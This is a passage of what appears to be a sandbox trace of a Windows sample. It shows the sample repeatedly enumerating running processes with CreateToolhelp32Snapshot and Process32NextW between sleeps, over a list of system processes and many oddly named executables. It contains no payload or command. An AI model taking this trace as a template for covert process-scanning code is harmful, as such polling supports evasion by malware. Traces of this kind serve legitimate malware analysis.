lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0128.672] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0128.673] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0128.675] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0128.676] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0128.678] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0128.679] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0128.680] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0128.682] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0128.683] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0128.684] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0128.685] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0128.686] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0128.687] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0128.688] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0128.689] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0128.690] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.691] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0128.692] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0128.693] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0128.717] CloseHandle (hObject=0xbc) returned 1 [0128.717] Sleep (dwMilliseconds=0x12c) [0129.068] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0129.073] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.073] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0129.074] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0129.075] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0129.075] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0129.076] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0129.077] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0129.077] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0129.078] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0129.078] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0129.079] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.080] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.080] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.081] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.082] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.082] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0129.083] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.084] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.084] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0129.085] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.087] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0129.088] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0129.089] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0129.090] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0129.091] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.092] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0129.093] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0129.094] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0129.096] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0129.097] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0129.098] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0129.099] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0129.100] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0129.101] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0129.102] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0129.103] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0129.104] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0129.105] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0129.106] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0129.108] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0129.109] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0129.110] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0129.111] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0129.112] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0129.113] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0129.114] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0129.162] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.163] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0129.164] CloseHandle (hObject=0xc4) returned 1 [0129.164] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0129.168] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.169] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0129.170] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0129.170] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0129.171] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0129.171] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0129.172] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0129.173] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0129.173] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0129.174] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0129.175] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.175] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.176] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.177] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 